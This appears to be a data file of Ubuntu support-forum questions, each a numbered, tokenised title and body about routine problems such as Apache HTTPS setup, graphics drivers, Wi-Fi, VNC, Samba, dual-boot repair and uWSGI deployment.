313154	site unresponsive to https	i followed the instructions of these documentations meticulously : https : //help.ubuntu.com/10.04/serverguide/certificates-and-security.html https : //help.ubuntu.com/10.04/serverguide/httpd.html however , my site is still unresponsive when entering the following in url : https : //mysite.com but the following does work : http : //mysite.com using https , in firefox i get the timeout message `` the connection has timed out '' . i tried some troubleshooting . there is nothing in /var/log/apache2/error.log that is related to this , and since the request is never acknowledged by my site , there is nothing in its logger either . when i run sudo netstat -tulpn , i do notice this entry : tcp 0 0 0.0.0.0:443 0.0.0.0 : * listen 3911/apache2 that makes me think apache2 is listening on 443 . so i think i need to do more than what the above instructions provided . this is what i did so far on my ubuntu server : openssl genrsa -des3 -out server.key 1024 openssl rsa -in server.key -out server.key.insecure mv server.key server.key.secure mv server.key.insecure server.key openssl req -new -key server.key -out server.csr openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt sudo cp server.crt /etc/ssl/certs sudo cp server.key /etc/ssl/private /etc/ssl/certs $ ls -l | grep `` server.crt '' -rw-r -- r -- 1 root root 1001 jun 26 00:39 server.crt /etc/ssl $ sudo su â ssl cd private â private ls server.key ssl-cert-snakeoil.key sudo a2ensite default-ssl sudo /etc/init.d/apache2 restart this is what my virtual host looks like : /etc/apache2/sites-enabled $ cat mysite.com < virtualhost *:80 > servername mysite.com documentroot /home/guarddoggps/public_html/mysite.com/current/public < directory /home/guarddoggps/public_html/mysite.com/current/public > allowoverride all options -multiviews < /directory > < locationmatch `` ^/assets/ . * $ '' > header unset etag fileetag none # rfc says only cache for 1 year expiresactive on expiresdefault `` access plus 1 year '' < /locationmatch > < /virtualhost > am i missing any steps ?
313161	where can i find the most up-to-date apt-get package list for my distribution ?	in other words , is there a website where i can find a simple list of all the packages that apt-get install searches through , along with descriptions of what each package does ? when i run apt-get update , i see that my computer hits http : //security.ubuntu.com and finds something called oneiric-updates . is there a human-friendly version of this website ?
313168	which is the fastest version of gnu/linux for my netbook ?	i have an acer aspire one . the specs are 1 gb ram , 1.6 ghz intel atom . i 'm looking for the fastest version of gnu/linux that is fully functional for this netbook . i do not want to run from a usb as my netbook is purely for linux . so far the only thing i 've been able to get to run correctly ( with small issues ) is ubuntu 12.04 with xubuntu interface .
313173	why are my 32bit opengl libraries pointing to mesa instead of nvidia , and how do i fix it ?	i have installed nvidia 's drivers on my ubuntu 13 system , but according to this command ( ldconfig -p | grep gl ) : $ ldconfig -p | grep gl libqtopengl.so.4 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libqtopengl.so.4 libglu.so.1 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libglu.so.1 libglewmx.so.1.8 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libglewmx.so.1.8 libglew.so.1.8 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libglew.so.1.8 libglesv2.so.2 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/mesa-egl/libglesv2.so.2 libgl.so.1 ( libc6 , x86-64 ) = > /usr/lib/libgl.so.1 libgl.so.1 ( libc6 ) = > /usr/lib/i386-linux-gnu/mesa/libgl.so.1 libgl.so ( libc6 , x86-64 ) = > /usr/lib/libgl.so libegl.so.1 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/mesa-egl/libegl.so.1 the 32bit version of opengl is pointing to mesa 's libraries instead of nvidia . this causes my steam games to refuse to launch with the error : could not find required opengl entry point 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated . why is this the case ? when the nvidia installer asked me if i wanted to install `` 32bit compatability libraries '' ( or something like that ) i chose yes . how do i fix this ? edit : i just reinstalled the same nvidia driver , and that apparently removed the 32bit opengl driver completely : $ ldconfig -p | grep libgl.so libgl.so.1 ( libc6 , x86-64 ) = > /usr/lib/libgl.so.1 libgl.so ( libc6 , x86-64 ) = > /usr/lib/libgl.so now steam wo n't start : you are missing the following 32-bit libraries , and steam may not run : libgl.so.1 again , i chose yes when the installer asked me if i wanted to install 32bit libraries . why are they not installed ! ?
313177	how can i get root access after i installed ubuntu on my pc ?	how can i get root access after i installed ubuntu on my pc ? the system keeps telling me that i have to be root for execution some of the commands .
313180	missing & failed folder at/and after installation	i am new to linux , and i 've trying to install ubuntu 12.04 lts ( dual boot with windows xp ) . i choose to add new partition ( fat32 150 gb ) for the shared folder . but when i pressed the install button , the installer warned me : failed to create the 150 gb shared partition . so i turned back to the partition section and changed the shared partition to 50gb fat32 ( /mnt/shared ) . i pressed the install button and i was successful . but , when i boot ubuntu , i could not find this 50gb folder . questions : 1 . what is wrong with the 150gb size ? is my hard disk failing ? 2 . why is the 50gb shared folder not showing ? thank for the help .
313187	should i install ubuntu desktop or ubuntu server ?	sorry if this is a simple question , but - eeks - i 'm really a windows person ( ! ) . i 'm getting a poweredge server to do really just one thing : i need to run interactive sessions of matlab ( parallel computing with high cpu/ram use ) . should i install the server or desktop version of ubuntu ? as an aside , i would have just gotten a workstation , but i got a good deal on the server with better specs - dual e5-2690s : ) i know basically nothing about this , so any help would be greatly appreciated ! thanks so much !
313188	running ubuntu on xbox 360 , possible to play pc games ?	i 'm considering throwing ubuntu onto my xbox 360 , but wanted to know if it 'd be able to handle a single game , league of legends . i 'm guessing no , not because the hardware is n't capable , but because there are no drivers good enough for the graphics needed . curious though as to if it 's possible as i currently am unable to play it on this pc ( too outdated ) .
313190	random black dot on the screen	black dots , or more something like this _- , apprear on my screen , but only in windows , not on the side bar . it is very anoying since it apprear every 30 sec and sometime every 5 sec in row . i have bumblebee installed . it may be related . here is a screeshot :
313192	how do i set up qt creator to use launchpad ?	i 've created an ubuntutouch program using qtcreator , and i 'd like to set it up to store it in launchpad . how do i do that ?
313193	can not locate ubuntu software center via firefox to open apt links	i 'm trying to locate where the ubuntu software center is to choose as default for handling apt links in firefox . i can click on the links , and i get the pop-up , but ubuntu software center is not there . i tried to choose an application through firefox 's settings and through the pop-up , but i do n't know the path . as you can see by my screen shot for the pop-up i chose the wrong one as that does n't work . what is the correct path i need to select the correct file ? edit - i added a fourth screen shot . i do n't have it in that location . this is what i have . my view is in abc order , and it 's showing hidden files .
313195	nexus 7 ( 4.2.2 ) stuck as read-only on ubuntu 13.04 ( pc )	i have a nexus 7 running the latest android ( 4.2.2 ) that seems to be stuck as read-only . i can not transfer any files to or from the device though i am free to look through it . permissions are : view content : only owner change content : nobody access content : nobody and when i try to change the permission i get this error : operation not supported by backend i 'm baffled . this is a stock install of ubuntu on my pc and the install is n't that old . am i missing a lib or something ? i feel the need to say it works fine on windows 7 . thanks for looking .
313207	install lightscribe on 64 bit amd error	i am trying to install lightscribe on a 64 bit ubuntu 12.04 . i have installed the 32 bit libs and i keep getting the following message : tedsch47 @ ted-laptop : ~/downloads/programs $ sudo dpkg -- install -- force architecture lightscribe-1.18.27.10-linux-2.6-intel.deb ( reading database ... 574566 files and directories currently installed . ) preparing to replace lightscribe : i386 1.18.27.10 ( using lightscribe-1.18.27.10-linux-2.6-intel.deb ) ... unpacking replacement lightscribe : i386 ... setting up lightscribe : i386 ( 1.18.27.10 ) ... ln : failed to create symbolic link `/usr/lib/libstdc++.so.5 ' : file exists how do i fix this ?
313208	hiding recent files in unity dashboard	ubuntu 13.04 ( though had the same issue in both 12.04 lts and 12.10 ) . unity desktop ( yes i like it , shush ) . anyways , when clicking on the dashboard there is a tab for 'files and folders ' . i do n't have any files on this computer that is n't porn . in other words , it displays the images there ( as it 's supposed to ) , but i ca n't have it displaying the porn for obvious reasons . i have disabled 'recent activity ' and even added the folder it 's all in to the 'do not record activity in the following folders ' . i 'm assuming that works but as i do n't actually have any other files , it still displays them . i do n't want to have to make it a hidden folder because it 's on an external hdd and causes issues when moving from computer to computer ( i have other movies on it as well ) . tl ; dr : get rid of the 'files and folders ' tab in the dashboard . is it possible ?
313217	install latest ffmpeg for all users in debina/ubuntu	i installed ffmpeg on my ubuntu using the guide : https : //ffmpeg.org/trac/ffmpeg/wiki/ubuntucompilationguide it is good and working . i know that guide is for installing ffmpeg for current user . can anybody help me to install ffmpeg for all users ? to do so i think there required only few changes in the steps specified at https : //ffmpeg.org/trac/ffmpeg/wiki/ubuntucompilationguide . but i am not sure about that . please help thank you .
313226	a complex problem regarding virtual machines	i want to run windows on linux in a seamless manner . that is , on booting up the linux system , the windows should be launched with no intervention from the user . the user should feel , that he is using windows , but underneath the linux would be running . he should be able to use the windows applications , network , networked devices and the internet within the vm itself . i have to install and demonstrate such a machine and also remove all notifications and options to the user which appears in the linux os including disabling access to the linux system when windows is running ( so as to not confuse the user ) . also steps reqd for disabling the use of keys like ctrl+alt+ del which may allow to do this . i have a virtualbox installed on an ubuntu 12 04 os . what are the steps ?
313227	qemu -cdrom ubuntu.iso -boot d -m 1024 -curses	how do i disable frame buffers in ubuntu 13.10 saucy kernel , i tried all kinds of kernel parameters but none work ? default ramdisk label ramdisk kernel /casper/vmlinuz append boot=casper toram initrd=/casper/initrd.img -- vesafb.nonsense=1 label isotest kernel /casper/vmlinuz append boot=casper integrity-check initrd=/casper/initrd.img -- vesafb.nonsense=1 label memtest kernel /install/memtest append - display isolinux.txt timeout 300 prompt 1
313231	how to figure out if my dvd-reader is also a burner ?	i am using ubuntu on a dell inspiron 14r . there are no writings like dvd-rx or dvd-rom on my dvd-reader . is there anything in ubuntu similar to the device manager in windows , so that i can know if i have a dvd-burner or not ?
313232	wifi disabled by hardware switch , ubuntu 13.04 , lenovo g580	my problem is that i installed ubuntu 13.04 on my lenovo g580 laptop . now wifi and bluetooth are not working , it is showing `` wifi is disabled by hardware switch '' . i tried using dedicated key fn+f5 , but did n't work and tried rfkill also . please help me
313236	rtnetlink answers : file exists - configure interface	forgive the newbie question . i am trying to setup eth1 in interfaces : however , i am getting : rtnetlink answers : file exists here are the results of ifconfig : what am i doing wrong ?
313238	vnc drops connection to ubuntu	when connecting to my server using tightvnc viewer the connection fails after a short time . usually i get the message `` connection has been gracefully closed '' , but sometimes the error is some socket connection lost error . i 'm running ubuntu 12.04.2 lts ( gnu/linux 3.2.0-43-generic x86_64 ) , and have installed ubuntu-desktop , gdm and tightvncserver . i have tried to various setting in the .vnc/xstartup with same result : ( the connection to the server ( using ssh/putty ) is never dropped , and the server is placed on internal network , so this is not a network issue . the log file : 27/06/13 09:23:02 xvnc version tightvnc-1.3.9 27/06/13 09:23:02 copyright ( c ) 2000-2007 tightvnc group 27/06/13 09:23:02 copyright ( c ) 1999 at & t laboratories cambridge 27/06/13 09:23:02 all rights reserved . 27/06/13 09:23:02 see http : //www.tightvnc.com/ for information on tightvnc 27/06/13 09:23:02 desktop name 'x ' ( ubuntu12:1 ) 27/06/13 09:23:02 protocol versions supported : 3.3 , 3.7 , 3.8 , 3.7t , 3.8t 27/06/13 09:23:02 listening for vnc connections on tcp port 5901 font directory '/usr/share/fonts/x11/75dpi/ ' not found - ignoring font directory '/usr/share/fonts/x11/100dpi/ ' not found - ignoring starting gnome gnome-session [ 1519 ] : warning : gsidlemonitor : idletime counter not found gnome_keyring_control=/tmp/keyring-lsr7cw gpg_agent_info=/tmp/keyring-lsr7cw/gpg:0:1 gnome_keyring_pid=1535 gnome_keyring_control=/tmp/keyring-lsr7cw gpg_agent_info=/tmp/keyring-lsr7cw/gpg:0:1 gnome_keyring_control=/tmp/keyring-lsr7cw gpg_agent_info=/tmp/keyring-lsr7cw/gpg:0:1 ssh_auth_sock=/tmp/keyring-lsr7cw/ssh gnome_keyring_control=/tmp/keyring-lsr7cw gpg_agent_info=/tmp/keyring-lsr7cw/gpg:0:1 ssh_auth_sock=/tmp/keyring-lsr7cw/ssh ( gnome-settings-daemon:1532 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/product_name : failed to open file '/sys/class/dmi/id/product_name ' : no such file or directory ( gnome-settings-daemon:1532 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/board_name : failed to open file '/sys/class/dmi/id/board_name ' : no such file or directory ( gnome-settings-daemon:1532 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/product_version : failed to open file '/sys/class/dmi/id/product_version ' : no such file or directory ( gnome-settings-daemon:1532 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/chassis_version : failed to open file '/sys/class/dmi/id/chassis_version ' : no such file or directory ( gnome-settings-daemon:1532 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/board_version : failed to open file '/sys/class/dmi/id/board_version ' : no such file or directory ( gnome-settings-daemon:1532 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/sys_vendor : failed to open file '/sys/class/dmi/id/sys_vendor ' : no such file or directory does anyone have a setup similar to mine , where it works ?
313242	where to install ubuntu ?	i 've decided to install ubuntu on a hard drive to run programs on , etc. , so that my family is not `` bothered '' with them . i purchased a 1tb hd , that is accessible through usb 1/2/3 , and i 've decided to run it externally . here 's my ideal situation ... turn on the computer . windows will automatically load , unless i press , f12 , select boot from usb . i 've partitioned the hard drive into three four sections . one for ubuntu and system files , one for `` swap '' ( still new to ubuntu ... not sure what that is so i gave it 50gb ) , one for general file storage , like a flash drive , and one with the rest of my storage on it . i 've created a cd , and plan to install just to the separate hard drive . here are my partitions : sdb1 ( ~400gb for ubuntu ) sdb2 ( ~300gb for file storage ) sdb3 ( ~50gb for swap ) sdb4 ( ~the rest ) it 's asking me where to put my bootloader . does it need its own partition ? does it have to be on the same one as ubuntu 's being installed on ? thanks , adam yakes novice
313244	install ubuntu over network on blank hd	i 'm curious if it 's possible to install unbuntu on a blank hd over the network . this is an hp windows home/media server ( hp ex490 ) , with no cd/dvd rom . the server does n't seem to respond to a usb monitor , keyboard or mouse . i feel like there 's information out there already on this , but i come up empty on google ( which i know i 'm probably just using the wrong search query ) . any help or direction you could give would be awesome !
313246	clean network-manager `` never '' connected record	how can i clean nm from all the network id i never get connected too ? traveling and moving here and there increase the list of net and i do n't need many of them ... so i would like to clean all the network that i never connect too . i wonder if there is a built in command to clean the list . i 'm not good with bash but i think it is easy to create script and so a cron job . a good starting point could be nmcli tool and in particular those command : nmcli con delete nmcli con list
313247	executable windows permission on samba	i 'm using ubuntu 13.04 ( though i 've had this same problem on 12.10 ) and am running samba with some shares set up so i can run some windows tools ( .exes ) directly from the shares . every windows computer i 've tried to run the programs on from the share give a permission error . the shares are read-only , have guest access and are created simply through the `` share '' tab of nautilus properties . if i check the box `` allow others to create and delete files in this folder '' , they are able to execute fine , but this is n't ideal . there 's no issue reading any other type of file or even copying the .exes over to a temporary location on the windows machine and running it . changing the executable bit makes no difference ( desperate ! ) . thanks .
313252	canon ip1180 printer driver for ubuntu ?	i 'm running ubuntu , and i ca n't get the canon ip1180 printer to print . do you know what to do ? thanks .
313255	can anyone tell me how to make guake terminal be part of the start-up applications ?	how can i add guake terminal to the start-up applications ?
313256	how can i create charm on one node	firstly i generation nodejs file on the node without charm then my boss said we need charm for generation . i need in this charm qt5 , nodejs , berkeley db , g++ with gcc but i do n't know how create charm because i`m a beginner in juju charm ... and i need result in end to the next week
313259	using egrep to find missing @ in log	i am using the following command to find log entries that are the result of a log in to the email server : egrep '_login [ ^ ] ' /var/log/exim_mainlog that works fine to find entries that contain content like this : p=esmtpa a=courier_login : name @ email.net s=1573 id=f1cd08396 , ... but what i need to do is to change my grep statement , so that it finds single word logins that do not use the @ sign , like so : p=esmtpa a=courier_login : name s=1573 id=f1cd08396 , ... where the log in before was `` name @ email.net '' , but in the second log entry , the log in used was only `` name '' . is this possible using grep or egrep , perhaps in some kind of a compound statement ? thanks much .
313266	trouble connecting to the internet with lenovo g500 , ubuntu 12.04	i recently burned the ubuntu 12.04 iso onto a blank dvd and used that to install ubuntu onto my lenovo g500 . i can see wireless networks after the drivers for my bcm4313 were installed , but i can not connect to any of them . also , my ethernet connection has not been recognized . i was able to connect to the internet when i boot to windows 8 . i have been trying to fix it for hours , transferring what i assume are drivers from other threads to no avail . i would really appreciate some personalized help . thanks , andrew
313270	print the error report	when i start my ubuntu 12.04 , i often get an error `` sorry , ubuntu 12.04 has experienced an internal error . if you notice further problems , try restarting the computer . '' how to print or save this report in detail ? thanks for the reply .
313271	.ogv video thumbnails in pcmanfm ?	is it possible to create video previews for ogv type media in pcmanfm ? i installed totem , but this seems to only work for thunar and nautilus .
313275	minidlna and samsung tv file format does n't support	i have pc with xubuntu 12.04 and samsung 27a950 , so i want to use my pc like dlna server . but i can run file of any format on my tv , get error : `` file format does n't support '' . i try to open *.avi , *.mkv and *.jpg files the same result . in error log i can see : [ 2013/06/27 12:34:03 ] upnphttp.c:1907 : error : error opening /home/family/media/file1.mkv [ 2013/06/27 12:34:06 ] upnphttp.c:1907 : error : error opening /home/family/media/file2.avi so , i have no idea why it does n't work . any suggestions ? minidlna version : version 1.24.1-stedy config file is default , only few directories added . with version of the default ubuntu repository was the same . some time ago i tried mediatomb , had the same error .
313279	remap dead_diaresis ( ? ) to to ctrl	i have some problem with my left little finger . so i 'm trying to remap the key which looks like this : with the ctrl-button . that part i managed . now i want to place that key on the caps lock key instead . that 's the part where i am stuck . this is my xmodmap-file : clear control keycode 35 = control_r add control = control_r control_l clear lock keycode 66 = dead_diaeresis and this is what xev shows me when currently pressing the key in the picture : keypress event , serial 29 , synthetic no , window 0x3000001 , root 0xc3 , subw 0x0 , time 11475613 , ( 392,225 ) , root : ( 393,308 ) , state 0x0 , keycode 35 ( keysym 0xffe4 , control_r ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 32 , synthetic no , window 0x3000001 , root 0xc3 , subw 0x0 , time 11475701 , ( 392,225 ) , root : ( 393,308 ) , state 0x4 , keycode 35 ( keysym 0xffe4 , control_r ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false and this is what xev shows me currently when pressing caps lock : keypress event , serial 32 , synthetic no , window 0x3000001 , root 0xc3 , subw 0x0 , time 11549397 , ( 493,363 ) , root : ( 494,446 ) , state 0x0 , keycode 66 ( keysym 0xfe57 , dead_diaeresis ) , same_screen yes , xlookupstring gives 2 bytes : ( c2 a8 ) `` ¨ '' xmblookupstring gives 0 bytes : xfilterevent returns : true keyrelease event , serial 32 , synthetic no , window 0x3000001 , root 0xc3 , subw 0x0 , time 11549493 , ( 493,363 ) , root : ( 494,446 ) , state 0x0 , keycode 66 ( keysym 0xfe57 , dead_diaeresis ) , same_screen yes , xlookupstring gives 2 bytes : ( c2 a8 ) `` ¨ '' xfilterevent returns : false
313280	connection timed out when connecting to a website ( ubuntu only )	i 've been struggling with these problem for months . it happens randomly and it happens on ubuntu only ( 12.04 ) . it 's about my hosted company website . some facts : i can ping it i can traceroute it i can dig it i can make a nslookup but whenever i try to open it in chrome it wo n't open . i also tried using polipo but got same connection time out issue . i 'm connected through a lan network and i 'm experiencing no problem with any other website . is there a more accurate debugging technique i 'm missing other than pinging/tracerouting , etc . ?
313285	can not bootup windows 7 after upgrading to ubuntu 12.04	i have tried boot-repair grub-update bootrec commands booting into safe mode with command prompt gets stuck with classpnp.sys file changing sata options in bios etc but windows keep throwing the stop error /blue screen . heres details from boot-repair http : //paste.ubuntu.com/5804023/ i have updated ubunto from 10.x to 12.x and have lost a day with no productive work heres a screenshot of the blue screen
313288	how to use multiple instances of gcc ?	i have both gcc 4.7.3 and 4.8.1 installed but on running gcc -- version i get gcc ( ubuntu/linaro 4.7.3-1ubuntu1 ) 4.7.3 copyright ( c ) 2012 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . i am an ubuntu newbie and i do n't know much about updating symbolic-links ... i searched the internet , and found out about update-alternatives but was reluctant to use it ... please can someone help me in choosing 4.8 over 4.7 & also tell me is it bad to have 2 versions of same gcc ?
313296	desktop theme changed , settings too	i opened ubuntu today and see that the template is changed of the desktop , my settings too , launcher icons too . why ? what happened ? on the login page , the desktop theme is as before . please help me . edit : it even does n't allow me to change the settings . when i turn on auto-hide launcher , it just go back to off in 100 milliseconds . ca n't change desktop theme , ca n't change language etc . when i open terminal : bash : /usr/local/etc/bash_profiles/source-profiles-bash : no such file or directory sourcemydotfile : command not found it affects just one user , when i use guest account or created a new one , it works fine . i need to fix the user i think .
313298	which fonts are pre-installed in ubuntu desktop ?	my laptop runs ubuntu 13.04 , and is able to display text in foreign languages ( e.g . chinese ) on websites . but this is not the case with debian . despite installing all locales , my browser does n't display text in foreign languages . so , does anyone know/have a list of all the font packages that ubuntu desktop comes pre-installed with ? ( so , that i can simply install them on debian . ) note : i need a list of packages , as i need to do this via command-line .
313300	fm radio without internet ?	is it possible to use fm radio without internet connection or special devices ? on my android phone , i can plug in the headphones , which are in turn used as antenna . since android is linux and ubuntu is also linux , it should be possible to do this on a plain old ubuntu notebook ( 13.04 ) , too . is it ? if yes , which application can i use for fm-radio ? i repeat : live fm-radio without internet connection at the time of listening .
313307	problem regarding email sending using ubuntu email server	i followed the following steps to send mail ( ) from my localhsot installed pear sudo apt-get install php-pear then installed following things one by one using pear for mail ( ) function to work . sudo pear install mail sudo pear install net_smtp sudo pear install auth_sasl sudo pear install mail_mime then install postfix sudo apt-get install postfix during installation : choose internet site enter localhost at the input area of mailserver . configure /etc/php5/apache2/php.ini in order to configure sendmail path : sendmail_path = `` /usr/sbin/sendmail -t -i '' restart apache server and test any mail script sudo service apache2 restart here 's the code : < ? php $ from_name = '' xyz '' ; $ from_mail = `` xyz @ essindia.co.in '' ; // $ to = `` sanjay.sirohee @ gmail.com '' ; // $ to = `` sanjay.kumar3 @ essindia.co.in '' ; // $ to = `` prakash.kumar @ essindia.co.in '' ; $ to = `` aggarwal.ankush @ gmail.com , ankush.aggarwal @ essindia.co.in '' ; $ subject = `` satish 's test mail '' ; $ mail_body = `` that is a email test '' ; $ message = $ mail_body ; $ headers = `` mime-version : 1.0 '' . `` \r\n '' ; $ headers .= `` content-type : text/html ; charset=utf-8\r\n '' ; $ headers .= `` from : `` . $ from_name . '' < `` . $ from_mail . `` > \r\n '' ; ob_start ( ) ; $ sendmail=mail ( $ to , $ subject , $ message , $ headers ) ; if ( $ sendmail ) { echo `` send '' ; } else { echo `` not send '' ; } ? > its is sending the mail to our company id as within intranet but is not able to send email within same environment . it gives the message that `` mail successfully sent '' but gmail and yahoo users are not able to receive the mail while our company email ids are receiving the email . please tell the possibilities of errors . what settings are required to be checked .
313311	how to install counter-strike 1.6 on ubuntu 13.04	just wanted to ask how can i install cs 1.6 on ubuntu 13.04 . i could n't install by using steam . thanks !
313315	trying to install ms office with wine via winetricks	installed wine from the software centre for ubuntu 13.04 , but i can not see winetricks in the dash despite synaptic telling me it is installed . i have tried just using wine but it fails half way through insallation with no useful message . i previously installed successfully this way in 12.04
313318	ca n't install ubuntu on vaio t13 ( window 7 )	i 've tried to install ubuntu on my vaio t13 ( ivy bridge ) windows 7 laptop using windows installer but it does n't work . after the system restarts , it said that i do n't have the root folder and advised me to change in the partition ( which i do n't understand ) what should i do next ? p.s . 1 ) i 've read this solution but i do n't understand http : //ubuntuforums.org/showthread.php ? t=2127699 2 ) i 'm very new to linux , so may i have a bit detailed process please thank you
313319	how to install ubuntu on htc one x	i want to install ubuntu on my htc one x. please help me in this regard . i have a problem when i run this command : sudo fastboot oem ublock
313322	how to wrap the application to create sh file in ubuntu linux	i have created one java application which takes number of external jar files and also vm arguments passed to it . i want to create .sh file for that application so that i cat run it on any linux system . please suggest me any tool to create .sh file in linux and which will also takes care about the arguments which has to be pass to application to run it . i have use the tool named jarsplice but its not working as there is problem in loading libraries after creation of sh file . so please suggest any tool for that .
313323	how to enable guifg and guibg in vim	as the title says , i want to know how can i enable the guifg and guibg in vim colorschemes . i already wrote in my vimrc set t_co=256 , but it enables only ctermfg and ctermbg for 256 colors . i have ubuntu 13.04 and i 'm using gnome-terminal ( but i tried with terminator terminal and also does n't work ) thanks in advance .
313326	a disk read error occurred press ctrl+alt+del to restart windows 7 laptop after installing ubuntu 13.04	i have a dell inspiron n5010 laptop . i installed ubuntu 13.04 along side with windows in another partition . after restarting my laptop it is showing 'windows 7 ( loader ) ' but an error is occurred while loading . my ubuntu 13.04 is working great . can any help me out with my problem .
313327	how to turn on ubuntu pc with remote desktop	can i turn on , logout , login one ubuntu pc from another ubuntu pc through remote desktop . i have also try remote desktop but i can only when pc is turn on .
313330	ca n't connect to specific wifi with 13.04	recently i have upgraded my os from 12.10 to 13.04 , its working just fine . i was not facing this problem till today but i am not able to connect to a particular wifi from the morning . i have two wifi here & i am able to connect to other one . as for the wifi , there is no issue as other persons who are using window can connect with that just fine . how to resolve this problem i do n't know ? note - i have restarted the wifi as well as the system two times to overcome this issue . edited for giving more info : lspci [ full lspci output can be found in revision 2 of this post ] ... . 04:00.0 network controller : intel corporation wifi link 5100 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) ... . sudo lshw -c network *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 00:24 : d6:43 : c0:58 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-25-generic firmware=8.83.5.1 build 33692 ip=192.168.1.17 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:44 memory : f0500000-f0501fff *-network disabled description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 03 serial : b8 : ac:6f:68:08:6d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168d-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:5000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff memory : f0420000-f043ffff dmesg [ 2244.563918 ] wlan0 : authenticate with 00:25:5e:17:6b:28 [ 2244.566162 ] wlan0 : send auth to 00:25:5e:17:6b:28 ( try 1/3 ) [ 2244.768488 ] wlan0 : send auth to 00:25:5e:17:6b:28 ( try 2/3 ) [ 2244.972143 ] wlan0 : send auth to 00:25:5e:17:6b:28 ( try 3/3 ) [ 2245.175754 ] wlan0 : authentication with 00:25:5e:17:6b:28 timed out [ 2264.745062 ] wlan0 : authenticate with 00:25:5e:17:6b:28 [ 2264.746376 ] wlan0 : direct probe to 00:25:5e:17:6b:28 ( try 1/3 ) [ 2264.949654 ] wlan0 : direct probe to 00:25:5e:17:6b:28 ( try 2/3 ) [ 2265.153340 ] wlan0 : direct probe to 00:25:5e:17:6b:28 ( try 3/3 ) [ 2265.356923 ] wlan0 : authentication with 00:25:5e:17:6b:28 timed out
313334	how do i fix `` chdir ( ) : no such file or directory [ uwsgi.c line 1723 ] '' on in wsgi on nginx ?	i have treeio project in my home directory , now i want to run that treeio in nginx server . already treeio can independently run on django comes with the source . i do n't want to run that in django server , but i want to run it on nginx server . i just followed the steps given in this answer of karthik . however , while executing or following step 4 from that answer , it throws the following error : [ uwsgi ] getting ini configuration from uwsgi.ini * starting uwsgi 1.0.3-debian ( 32bit ) on [ thu jun 27 17:22:01 2013 ] * compiled with version : 4.6.3 on 17 july 2012 02:24:04 current working directory : /home/rajesh/treeio detected binary path : /usr/bin/uwsgi-core chdir ( ) : no such file or directory [ uwsgi.c line 1723 ] my uwsgi.ini file contains [ uwsgi ] # set the http port http = :8080 # change to django project directory chdir = /home/treeio/ # add /var/www to the pythonpath , in this way we can use the project.app format pythonpath = /var/www # set the project settings name env = django_settings_module=treeio.settings # load django module = django.core.handlers.wsgi : wsgihandler ( ) please help me in deploying treeio in nginx server .
313336	if i use wubi to install on the same driver as windows xp , what will happen ?	will all xp files be deleted ? i 'm new to ubuntu and all i want to know is if those files of xp wo n't get lost at all .
313341	i deleted all files and folders ( including hidden ) from /home/username/ now in big trouble	i am logged into a remote ubuntu server , and i accidentally erased the entire /home/username/ directory for the current user . the only thing left is a hidden directory called .gvfs . i do n't need anything of the documents/music/etc . now it is not letting me cd into the /var/www/ directory , which has permissions 666 and it is owned by the current user . i am afraid to disconnect from my ssh session because i do n't know if i will be able to get back on . have i permanently created a problem ? is there a way i can replace the most important files to the /home/username/ directory ? thanks ! ** edit ** thanks everyone for the help . i figured the problem with cd into the /var/www/ was actually my permissions in the /var/www/ directory . it was set to 666 , changed it to 755 and everything was good again . it does n't look like anything systematic was ruined by deleting the contents of the user folder .
313343	does javascript work in linux server ?	i have a php file with a javascript and on clicking 'submit ' , the js should be called . but nowhere i can find this solution done . i am unable to get my javascript work in this linux server . but the same piece of code works in windows . is there any thing in particular i need to install in linux ? it 's a normal javascript . like , if i enter user name and password in my login.php page , on click of submit button , the javascript has to perform the validation script to correct user was logged or not . but this script is not getting called . is there anything that i need to install for javascript to work in my linux system ? because the same script works in my windows system . this is happening to all my javascripts whereever i call , not specific to this login page .
313345	installed ubuntu on wrong hard drive , how do i remove ?	i have a 128gb ssd with windows 7 installed and a 500gb disk partioned into 100gb and 400gb . i incorrectly installed ubuntu on the 400gb partition and as a result have no option to select ubuntu as an operating system when i boot up my pc . i understand there is an issue when removing linux due to something about grub loader , can i simply format the hdd ( contains nothing of importance ) containing linux and be gone with it as windows 7 is on a different disk altogether and i never actually accessed ubuntu ? i am hoping i am overcomplicating things for myself , please can someone point me in the right direction !
